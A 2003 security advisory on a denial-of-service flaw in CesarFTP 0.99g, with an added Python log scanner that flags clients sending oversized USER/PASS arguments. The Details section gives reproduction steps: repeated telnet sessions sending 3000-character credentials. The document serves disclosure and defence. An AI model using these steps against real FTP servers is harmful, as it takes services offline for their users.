Tripbit Security Advisory
TA-250403 


Severity: Medium/High
Application: CesarFTP Server 0.99g
Platform: Windows
Class: Denial of Service
Release Date: April 25th, 2003
Vendor: http://www.aclogic.com


• Overview

CesarFTP, an FTP server for Windows, has problems with authentication. When the username and password buffers are too big, it is vulnerable to a Denial of Service attack.

• Details
First FTP session
C:\> ftp <host> <port>
Connection with 80.146.140.248 was established.
220 CesarFTP 0.99g Server Welcome !
User (80.146.140.248:(none)): username
Password: ******
ftp>


First Telnet session

C:\> telnet <host> <port>
220 CesarFTP 0.99g Server Welcome !
USER (3000 A's)
PASS (3000 A's)


Second telnet session
C:\> telnet <host> <port>
220 CesarFTP 0.99g Server Welcome !
USER (3000 A's)
PASS (3000 A's)


Third telnet session
C:\> telnet <host> <port>
220 CesarFTP 0.99g Server Welcome !
USER (3000 A's)
PASS (3000 A's)


Typing 'ls', for example, in the first FTP session now does nothing, because the server no longer processes the command. Opening a second FTP session also fails: it cannot connect to the server.
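
A defender's check for the pattern above, as an added example that is not part of the original advisory: it scans FTP control-channel records for USER/PASS arguments far longer than any real credential and reports clients that repeat this across sessions. The record format, the 256-byte limit and the three-session threshold are assumptions, and the sample records are constructed.

```python
import re
from collections import defaultdict

# Assumed limit for a USER/PASS argument; the advisory only shows that
# 3000 bytes is too many, it does not give the exact breaking point.
MAX_ARG_LEN = 256
# Assumed alert threshold: offending sessions seen from one client.
SESSION_THRESHOLD = 3

# Constructed record format: "<client_ip> <session_id> <raw FTP command line>"
LINE_RE = re.compile(r"^(\S+) (\S+) (USER|PASS) (.*)$", re.IGNORECASE)


def oversized_auth(lines, max_len=MAX_ARG_LEN):
    """Yield (client, session, verb, arg_len) for USER/PASS args over max_len."""
    for line in lines:
        m = LINE_RE.match(line.rstrip("\r\n"))
        if m and len(m.group(4)) > max_len:
            yield m.group(1), m.group(2), m.group(3).upper(), len(m.group(4))


def flag_clients(lines, max_len=MAX_ARG_LEN, threshold=SESSION_THRESHOLD):
    """Return {client: sorted session ids} for clients that sent oversized
    credentials in at least `threshold` distinct sessions."""
    sessions = defaultdict(set)
    for client, session, _verb, _length in oversized_auth(lines, max_len):
        sessions[client].add(session)
    return {c: sorted(s) for c, s in sessions.items() if len(s) >= threshold}


# Constructed sample: one normal login, then three sessions shaped like
# the telnet sessions in the advisory (documentation-range addresses).
SAMPLE = [
    "192.0.2.10 s1 USER username",
    "192.0.2.10 s1 PASS secret",
    "198.51.100.7 s2 USER " + "A" * 3000,
    "198.51.100.7 s2 PASS " + "A" * 3000,
    "198.51.100.7 s3 user " + "A" * 3000,
    "198.51.100.7 s3 PASS " + "A" * 3000,
    "198.51.100.7 s4 USER " + "A" * 3000,
    "198.51.100.7 s4 PASS " + "A" * 3000,
]

if __name__ == "__main__":
    for client, sids in flag_clients(SAMPLE).items():
        print(f"{client}: oversized USER/PASS in sessions {', '.join(sids)}")
```

The same length test can run in a filtering proxy in front of the server, dropping over-long control lines before they reach it.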

• Recommendation
No solution for the moment.

• Vendor Response
The vendor has been notified but has not answered this report.

• Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an 'AS IS' condition. There are 'NO' warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

• Additional information
This vulnerability has been found and researched by:

posidron posidron@tripbit.org

rushjo rushjo@tripbit.org

• Availability
You can find the latest version of this warning under the following URL:

http://www.tripbit.org/advisories/TA-250403.html